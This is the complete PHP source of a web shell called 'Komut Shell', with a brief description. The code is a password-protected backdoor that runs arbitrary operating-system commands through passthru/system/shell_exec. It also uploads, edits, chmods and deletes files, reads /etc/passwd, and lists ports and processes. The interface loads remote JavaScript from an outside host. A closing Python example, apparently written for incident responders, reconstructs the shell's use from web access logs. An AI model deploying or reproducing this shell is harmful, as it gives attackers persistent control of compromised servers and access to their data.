
Source Code of Komut Shell

This PHP script provides a web-based shell interface that allows executing commands on the server. It checks for a hardcoded password, sets up a session, and displays an interactive interface with options to run commands, view/edit/delete files, get system information, and see active ports and processes. The command echoed back to the page is escaped with htmlspecialchars(), but the command string itself is passed to passthru(), system() or shell_exec() as submitted.

Uploaded by

Rassoul SOW

1 <?php ?><?php
2 session_start();
3 error_reporting(0);
4 $password = "webr00t"; //Change this to your password ;)
5 $version = "0.7B";
6 $functions = array('Ekrani Temizle' => 'ClearScreen()', 'Gecmisi Temizle' =>
'ClearHistory()', 'Fonksiyon Bilgisi' => "runcommand('canirun','GET')", 'Server
Bilgisi' => "runcommand('showinfo','GET')", '/etc/passwd Oku' =>
"runcommand('etcpasswdfile','GET')", 'Acik Portlar' => "runcommand('netstat -an |
grep -i listen','GET')", 'Calisan Uygulamalar' => "runcommand('ps -aux','GET')",);
7 $thisfile = basename(__FILE__);
8 $style = '<style type="text/css">
9 .cmdthing {
10 border-top-width: 0px;
11 font-weight: bold;
12 border-left-width: 0px;
13 font-size: 10px;
14 border-left-color: #000000;
15 background: #000000;
16 border-bottom-width: 0px;
17 border-bottom-color: #FFFFFF;
18 color: #FFFFFF;
19 border-top-color: #008000;
20 font-family: verdana;
21 border-right-width: 0px;
22 border-right-color: #000000;
23 }
24 input,textarea {
25 border-top-width: 1px;
26 font-weight: bold;
27 border-left-width: 1px;
28 font-size: 10px;
29 border-left-color: #FFFFFF;
30 background: #000000;
31 border-bottom-width: 1px;
32 border-bottom-color: #FFFFFF;
33 color: #FFFFFF;
34 border-top-color: #FFFFFF;
35 font-family: verdana;
36 border-right-width: 1px;
37 border-right-color: #FFFFFF;
38 }
39 A:hover {
40 text-decoration: none;
41 }
42
43
44 table,td,div {
45 border-collapse: collapse;
46 border: 1px solid #FFFFFF;
47 }
48 body {
49 color: #FFFFFF;
50 font-family: verdana;
51 }
52 </style>';
53 $sess = __FILE__ . $password;
54 if (isset($_POST['p4ssw0rD'])) {
55 if ($_POST['p4ssw0rD'] == $password) {
56 $_SESSION[$sess] = $_POST['p4ssw0rD'];
57 } else {
58 die("Wrong password");
59 }
60 }
61 if ($_SESSION[$sess] == $password) {
62 if (isset($_SESSION['workdir'])) {
63 if (file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir'])) {
64 chdir($_SESSION['workdir']);
65 }
66 }
67 if (isset($_FILES['uploadedfile']['name'])) {
68 $target_path = "./";
69 $target_path = $target_path . basename($_FILES['uploadedfile']['name']);
70 if (move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path))
{
71 }
72 }
73 if (isset($_GET['runcmd'])) {
74 $cmd = $_GET['runcmd'];
75 print "<b>" . get_current_user() . "~# </b>" . htmlspecialchars($cmd) .
"<br>";
76 if ($cmd == "") {
77 print "Empty Command..type \"shellhelp\" for some ehh...help";
78 } elseif ($cmd == "upload") {
79 print '<br>Uploading to: ' . realpath(".");
80 if (is_writable(realpath("."))) {
81 print "<br><b>I can write to this directory</b>";
82 } else {
83 print "<br><b><font color=red>I can't write to this directory, please
choose another one.</b></font>";
84 }
85 } elseif ((ereg("changeworkdir (.*)", $cmd, $file)) || (ereg("cd (.*)", $cmd,
$file))) {
86 if (file_exists($file[1]) && is_dir($file[1])) {
87 chdir($file[1]);
88 $_SESSION['workdir'] = $file[1];
89 print "Current directory changed to " . $file[1];
90 } else {
91 print "Directory not found";
92 }
93 } elseif (ereg("editfile (.*)", $cmd, $file)) {
94 if (file_exists($file[1]) && !is_dir($file[1])) {
95 print "<form name=\"saveform\"><textarea cols=70 rows=10
id=\"area1\">";
96 $contents = file($file[1]);
97 foreach ($contents as $line) {
98 print htmlspecialchars($line);
99 }
100 print "</textarea><br><input size=80 type=text name=filetosave
value=" . $file[1] . "><input value=\"Save\" type=button
onclick=\"SaveFile();\"></form>";
101 } else {
102 print "File not found.";
103 }
104 } elseif (ereg("deletefile (.*)", $cmd, $file)) {
105 if (is_dir($file[1])) {
106 if (rmdir($file[1])) {
107 print "Directory succesfully deleted.";
108 } else {
109 print "Couldn't delete directory!";
110 }
111 } else {
112 if (unlink($file[1])) {
113 print "File succesfully deleted.";
114 } else {
115 print "Couldn't delete file!";
116 }
117 }
118 } elseif (strtolower($cmd) == "canirun") {
119 print "<br>";
120 if (function_exists(passthru)) {
121 print "Passthru: <b><font color=green>Enabled</b></font><br>";
122 } else {
123 print "Passthru: <b><font color=red>Disabled</b></font><br>";
124 }
125 if (function_exists(exec)) {
126 print "Exec: <b><font color=green>Enabled</b></font><br>";
127 } else {
128 print "Exec: <b><font color=red>Disabled</b></font><br>";
129 }
130 if (function_exists(system)) {
131 print "System: <b><font color=green>Enabled</b></font><br>";
132 } else {
133 print "System: <b><font color=red>Disabled</b></font><br>";
134 }
135 if (function_exists(shell_exec)) {
136 print "Shell_exec: <b><font color=green>Enabled</b></font><br>";
137 } else {
138 print "Shell_exec: <b><font color=red>Disabled</b></font><br>";
139 }
140 print "<br><br>";
141 if (ini_get('safe_mode')) {
142 print "Safe Mode: <b><font color=red>Enabled</b></font>";
143 } else {
144 print "Safe Mode: <b><font color=green>Disabled</b></font>";
145 }
146 print "<br><br><br>";
147 if (ini_get('open_basedir')) {
148 print "Open_basedir: <b><font color=red>Enabled</b></font>";
149 } else {
150 print "Open_basedir: <b><font color=green>Disabled</b></font>";
151 }
152 }
153 //About the shell
154 elseif (ereg("listdir (.*)", $cmd, $directory)) {
155 if (!file_exists($directory[1])) {
156 die("Directory not found");
157 }
158 //Some variables
159 chdir($directory[1]);
160 $i = 0;
161 $f = 0;
162 $dirs = "";
163 $filez = "";
164 if (!ereg("/$", $directory[1])) //Does it end with a slash?
165 {
166 $directory[1].= "/"; //If not, add one
167
168 }
169 print "Listing directory: " . $directory[1] . "<br>";
170 print "<table
border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>";
171 if ($handle = opendir($directory[1])) {
172 while (false !== ($file = readdir($handle))) {
173 if (is_dir($file)) {
174 $dirs[$i] = $file;
175 $i++;
176 } else {
177 $filez[$f] = $file;
178 $f++;
179 }
180 }
181 print "<td>";
182 foreach ($dirs as $directory) {
183 print "<i style=\"cursor:crosshair\" onclick=\"deletefile('" .
realpath($directory) . "');\">[D]</i><i style=\"cursor:crosshair\"
onclick=\"runcommand('changeworkdir " . realpath($directory) .
"','GET');\">[W]</i><b style=\"cursor:crosshair\"
onclick=\"runcommand('clear','GET'); runcommand ('listdir " . realpath($directory) .
"','GET'); \">" . $directory . "</b><br>";
184 }
185 print "</td><td>";
186 foreach ($filez as $file) {
187 print "<i style=\"cursor:crosshair\" onclick=\"deletefile('" .
realpath($file) . "');\">[D]</i><u style=\"cursor:crosshair\"
onclick=\"runcommand('editfile " . realpath($file) . "','GET');\">" . $file . "</u><br>";
188 }
189 print "</td></table>";
190 }
191 } elseif (strtolower($cmd) == "about") {
192 print "Ajax Command Shell by <a
href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version";
193 }
194 //Show info
195 elseif (strtolower($cmd) == "showinfo") {
196 if (function_exists(disk_free_space)) {
197 $free = disk_free_space("/") / 1000000;
198 } else {
199 $free = "N/A";
200 }
201 if (function_exists(disk_total_space)) {
202 $total = trim(disk_total_space("/") / 1000000);
203 } else {
204 $total = "N/A";
205 }
206 $path = realpath(".");
207 print "<b>Free:</b> $free / $total MB<br><b>Current path:</b>
$path<br><b>Uname -a Output:</b><br>";
208 if (function_exists(passthru)) {
209 passthru("uname -a");
210 } else {
211 print "Passthru is disabled :(";
212 }
213 }
214 //Read /etc/passwd
215 elseif (strtolower($cmd) == "etcpasswdfile") {
216 $pw = file('/etc/passwd/');
217 foreach ($pw as $line) {
218 print $line;
219 }
220 }
221 //Execute any other command
222 else {
223 if (function_exists(passthru)) {
224 passthru($cmd);
225 } else {
226 if (function_exists(exec)) {
227 exec("ls -la", $result);
228 foreach ($result as $output) {
229 print $output . "<br>";
230 }
231 } else {
232 if (function_exists(system)) {
233 system($cmd);
234 } else {
235 if (function_exists(shell_exec)) {
236 print shell_exec($cmd);
237 } else {
238 print "Sorry, none of the command functions works.";
239 }
240 }
241 }
242 }
243 }
244 } elseif (isset($_GET['savefile']) && !empty($_POST['filetosave']) && !
empty($_POST['filecontent'])) {
245 $file = $_POST['filetosave'];
246 if (!is_writable($file)) {
247 if (!chmod($file, 0777)) {
248 die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this
message ^_^
249
250 }
251 }
252 $fh = fopen($file, 'w');
253 $dt = $_POST['filecontent'];
254 fwrite($fh, $dt);
255 fclose($fh);
256 } else {
257 ?>
258 <html>
259 <title>Komut Shell ~ <?php print getenv("HTTP_HOST"); ?> ~ by
WebRooT</title>
260 <meta http-equiv="Content-Type" content="text/html; charset=windows-1254" />
261 <head>
262 <?php print $style; ?>
263 <SCRIPT TYPE="text/javascript">
264 function sf(){document.cmdform.command.focus();}
265 var outputcmd = "";
266 var cmdhistory = "";
267 function ClearScreen()
268 {
269 outputcmd = "";
270 document.getElementById('output').innerHTML = outputcmd;
271 }
272
273 function ClearHistory()
274 {
275 cmdhistory = "";
276 document.getElementById('history').innerHTML = cmdhistory;
277 }
278
279 function deletefile(file)
280 {
281 deleteit = window.confirm("Are you sure you want to delete
282 "+file+"?");
283 if(deleteit)
284 {
285 runcommand('deletefile ' + file,'GET');
286 }
287 }
288
289 var http_request = false;
290 function makePOSTRequest(url, parameters) {
291 http_request = false;
292 if (window.XMLHttpRequest) {
293 http_request = new XMLHttpRequest();
294 if (http_request.overrideMimeType) {
295 http_request.overrideMimeType('text/html');
296 }
297 } else if (window.ActiveXObject) {
298 try {
299 http_request = new ActiveXObject("Msxml2.XMLHTTP");
300 } catch (e) {
301 try {
302 http_request = new ActiveXObject("Microsoft.XMLHTTP");
303 } catch (e) {}
304 }
305 }
306 if (!http_request) {
307 alert('Cannot create XMLHTTP instance');
308 return false;
309 }
310
311
312 http_request.open('POST', url, true);
313 http_request.setRequestHeader("Content-type", "application/x-www-form-
urlencoded");
314 http_request.setRequestHeader("Content-length", parameters.length);
315 http_request.setRequestHeader("Connection", "close");
316 http_request.send(parameters);
317 }
318
319
320 function SaveFile()
321 {
322 var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) +
323 "&filecontent=" +
encodeURI( document.getElementById("area1").value );
324 makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr);
325 document.getElementById('output').innerHTML =
document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save,
you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it
automaticly.";
326 }
327
328 function runcommand(urltoopen,action,contenttosend){
329 cmdhistory = "<br>&nbsp;<i style=\"cursor:crosshair\"
onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen +
"</i> " + cmdhistory;
330 document.getElementById('history').innerHTML = cmdhistory;
331 if(urltoopen == "clear")
332 {
333 ClearScreen();
334 }
335 var ajaxRequest;
336 try{
337 ajaxRequest = new XMLHttpRequest();
338 } catch (e){
339 try{
340 ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
341 } catch (e) {
342 try{
343 ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP");
344 } catch (e){
345 alert("Wicked error, nothing we can do about it...");
346 return false;
347 }
348 }
349 }
350 ajaxRequest.onreadystatechange = function(){
351 if(ajaxRequest.readyState == 4){
352 outputcmd = "<pre>" + outputcmd + ajaxRequest.responseText +"</pre>";
353 document.getElementById('output').innerHTML = outputcmd;
354 var objDiv = document.getElementById("output");
355 objDiv.scrollTop = objDiv.scrollHeight;
356 }
357 }
358 ajaxRequest.open(action, "?runcmd="+urltoopen , true);
359 if(action == "GET")
360 {
361 ajaxRequest.send(null);
362 }
363 document.cmdform.command.value='';
364 return false;
365 }
366
367 function set_tab_html(newhtml)
368 {
369 document.getElementById('commandtab').innerHTML = newhtml;
370 }
371
372 function set_tab(newtab)
373 {
374 if(newtab == "cmd")
375 {
376 newhtml = '&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return
runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>:
<input type=text name=command class=cmdthing size=100%><br></form>';
377 }
378 else if(newtab == "upload")
379 {
380 runcommand('upload','GET');
381 newhtml = '<font size=0><b>Sayfa Yenilenecek...</b><br><br><form
enctype="multipart/form-data" action="<?php print $ThisFile; ?>"
method="POST"><input type="hidden" name="MAX_FILE_SIZE"
value="10000000" />Dosya se: <input name="uploadedfile" type="file" /><br
/><input type="submit" value="Upload File" /></form></font>';
382 }
383 else if(newtab == "workingdir")
384 {
385 <?php
386 $folders = "<form name=workdir onsubmit=\"return
runcommand(\'changeworkdir \' +
document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text
name=changeworkdir value=\"";
387 $pathparts = explode("/", realpath("."));
388 foreach ($pathparts as $folder) {
389 $folders.= $folder . "/";
390 }
391 $folders.= "\"><input type=submit value=Change></form><br>Script
directory: <i style=\"cursor:crosshair\"
onclick=\"document.workdir.changeworkdir.value=\'" . dirname(__FILE__) . "\'>" .
dirname(__FILE__) . "</i>";
392 ?>
393 newhtml = '<?php print $folders; ?>';
394 }
395 else if(newtab == "filebrowser")
396 {
397 newhtml = '<b>File browser is under construction! Use at your own risk!
</b> <br>You can use it to change your working directory easily, don\'t expect too
much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working
directory.<br><i>[D]</i> = delete file/directory';
398 runcommand('listdir .','GET');
399 }
400 else if(newtab == "createfile")
401 {
402 newhtml = '<b>File Editor, under construction.</b>';
403 document.getElementById('output').innerHTML = "<form
name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input
size=80 type=text name=filetosave value=\"<?php print realpath('.') . "/" . rand(1000,
999999) . ".txt"; ?>\"><input value=\"Save\" type=button
onclick=\"SaveFile();\"></form>";
404
405 }
406 document.getElementById('commandtab').innerHTML = newhtml;
407 }
408 </script>
409 </head>
410 <body bgcolor=black onload="sf();" vlink=white alink=white link=white>
411 <table border=1 width=100% height=100%>
412 <td width=15% valign=top>
413 <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
414 <form name="extras"><br>
415 <center><b>Hizli Komutlar</b><br>
416
417 <div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'>
418 <?php
419 foreach ($functions as $name => $execute) {
420 print '&nbsp;<input type="button" value="' . $name . '" onclick="' .
$execute . '"><br>';
421 }
422 ?>
423
424 </center>
425
426 </div>
427 </form>
428 <center><b>Komut Gecmisi</b><br></center>
429 <div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width:
100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div>
430 <br>
431 <center><b>Hakkinda</b><br></center>
432 <div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align:
center;overflow: auto; font-size: 10px;'>
433 <br>
434 <b><font size=3>Komut Shell</b></font><br>by WebRooT
435 <br>
436 Version <?php print $version; ?>
437 </div>
438 <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
439 </td>
440 <td width=70%>
441 <table border=0 width=100% height=100%><td id="tabs" height=1%><font
size=0>
442 <b style="cursor:crosshair" onclick="set_tab('cmd');">[Komut alistir]</b>
443 <b style="cursor:crosshair" onclick="set_tab('upload');">[Dosya Upload]</b>
444 <b style="cursor:crosshair" onclick="set_tab('workingdir');">[Dizin Degistir]</b>
445 <b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Dosya
Yoneticisi]</b>
446 <b style="cursor:crosshair" onclick="set_tab('createfile');">[Dosya Olustur]</b>
447
448 </font></td>
449 <tr>
450 <td height=99% width=100% valign=top><div id="output"
style='height:100%;white-space:pre;overflow:auto'></div>
451
452 <tr>
453 <td height=1% width=100% valign=top>
454 <div id="commandtab" style='height:100%;white-space:pre;overflow:auto'>
455 &nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return
runcommand(document.cmdform.command.value,'GET');">
456 <b>Komut Satiri</b>: <input type=text name=command class=cmdthing
size=100%><br>
457 </form>
458 </div>
459 </td>
460 </table>
461 </td>
462 </table>
463 </body>
464 </html>
465 <?php
466 }
467 } else {
468 print "<center><table border=0 height=100%>
469 <td valign=middle>
470 <form action=" . basename(__FILE__) . " method=POST>Ltfen giris yapiniz.
(sifre=webr00t)<br><b>Password:</b><input type=password
name=p4ssw0rD><input type=submit value=\"Log in\">
471 </form>";
472 }
473 ?>
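
Because the listing's `runcommand()` sends every command as a GET request to `?runcmd=...`, and file saves as a POST to `?savefile`, the operator's activity can be reconstructed from ordinary web access logs. The following Python is an added example for incident responders, not part of the uploaded document; it assumes Combined Log Format, and the sample log lines, addresses and the `/uploads/img.php` path are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Verbs the listing handles itself before falling through to passthru()/system().
BUILTIN_VERBS = ("changeworkdir", "cd", "editfile", "deletefile", "listdir",
                 "canirun", "showinfo", "etcpasswdfile", "upload", "about")

# Combined Log Format prefix: client, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify(command):
    """Approximate which branch of the listing's if/elseif chain a command hits."""
    if command == "":
        return "empty"
    verb = command.split(" ", 1)[0].lower()
    return "builtin:" + verb if verb in BUILTIN_VERBS else "os-command"

def find_shell_requests(log_lines):
    """Return one dict per request that uses the runcmd / savefile interface."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        url = urlsplit(m["target"])
        # keep_blank_values so the bare "?savefile" flag is not dropped
        query = parse_qs(url.query, keep_blank_values=True)
        hit = {"ip": m["ip"], "ts": m["ts"], "path": url.path,
               "status": int(m["status"])}
        if "runcmd" in query:
            cmd = query["runcmd"][0]  # parse_qs has already percent-decoded it
            hits.append({**hit, "kind": classify(cmd), "command": cmd})
        elif "savefile" in query and m["method"] == "POST":
            # File content travels in the POST body, which access logs omit.
            hits.append({**hit, "kind": "file-write", "command": None})
    return hits

# Constructed sample data: addresses, timestamps and the script path are made up.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2024:10:01:02 +0000] "GET /uploads/img.php?runcmd=canirun HTTP/1.1" 200 412',
    '203.0.113.7 - - [12/Mar/2024:10:01:09 +0000] "GET /uploads/img.php?runcmd=listdir%20. HTTP/1.1" 200 2210',
    '203.0.113.7 - - [12/Mar/2024:10:01:30 +0000] "GET /uploads/img.php?runcmd=ps%20-aux HTTP/1.1" 200 9120',
    '203.0.113.7 - - [12/Mar/2024:10:02:11 +0000] "POST /uploads/img.php?savefile HTTP/1.1" 200 0',
    '198.51.100.4 - - [12/Mar/2024:10:02:15 +0000] "GET /index.php?page=2 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for h in find_shell_requests(SAMPLE_LOG):
        print(h["ts"], h["ip"], h["path"], h["kind"], repr(h["command"]))
```

The login password (the `p4ssw0rD` field) and uploaded files travel in POST bodies, so they do not appear in access logs; only the `runcmd` query strings and the `?savefile` request line do.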
